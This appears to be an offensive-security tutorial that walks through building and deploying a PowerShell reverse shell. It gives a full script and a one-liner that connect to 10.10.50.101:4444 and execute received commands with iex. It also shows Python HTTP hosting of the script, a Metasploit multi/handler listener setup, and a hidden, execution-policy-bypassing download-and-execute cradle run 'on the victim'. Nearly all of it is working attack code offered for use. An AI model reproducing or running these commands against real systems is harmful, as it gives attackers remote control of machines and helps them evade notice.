Below is the PowerShell script:
```powershell
# Connect back to the listener, then loop: read a command, execute it with iex,
# and return its output (stdout and errors) followed by a prompt.
$client = New-Object System.Net.Sockets.TCPClient('10.10.50.101',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()
```

The same logic condensed to a single line (no prompt is sent back; the command output is flattened with Out-String before it is encoded, otherwise GetBytes receives an object array rather than a string):

```powershell
$sm=(New-Object Net.Sockets.TCPClient('10.10.50.101',4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1|Out-String));$sm.Write($st,0,$st.Length)}
```
We save the script as "reverse.ps1" in a directory and host that directory over HTTP with Python's built-in server (SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is `python3 -m http.server 8000`):

```shell
root@kali:~/shell# ls
reverse.ps1
root@kali:~/shell# python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
```
We then set up a Metasploit multi/handler to catch the connection. One caveat: the script above is a plain, unstaged TCP shell that only reads command text and writes output back. The transcript below selects the staged payload windows/shell/reverse_tcp, which makes the handler push a second stage to whatever connects; the matching choice for this script is the unstaged windows/shell_reverse_tcp (or generic/shell_reverse_tcp), with the same LHOST and LPORT.
```
root@kali:~/shell# msfconsole

       =[ metasploit v4.17.21-dev                         ]
+ -- --=[ 1822 exploits - 1033 auxiliary - 316 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.10.50.101
LHOST => 10.10.50.101
msf exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.50.101     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.10.50.101:4444
msf exploit(multi/handler) >
```
With the script hosted and the listener running, we deliver the payload on the victim.

The command below launches PowerShell with the execution policy set to Bypass and the window hidden (`-w` is short for `-WindowStyle`; it hides the console rather than closing it). It downloads the script over HTTP with WebClient and hands the text straight to iex, so the script runs in memory and is never written to disk. Because reverse.ps1 is top-level code, iex executes it immediately; there is nothing to invoke afterwards, and a trailing `reverse.ps1` would only produce a "command not found" error once the shell exits.

```powershell
powershell.exe -executionpolicy bypass -w hidden "iex(New-Object System.Net.WebClient).DownloadString('http://10.10.50.101:8000/reverse.ps1')"
```
Below is what our victim looks like before execution:
Here's a screenshot of our listener:
Because the handler was started with ExitOnSession false and as a background job (exploit -j), it keeps listening after the first session arrives: we can background the session (Ctrl-Z in the session, then confirm) and wait for further connections from other systems.
Hope this has been helpful!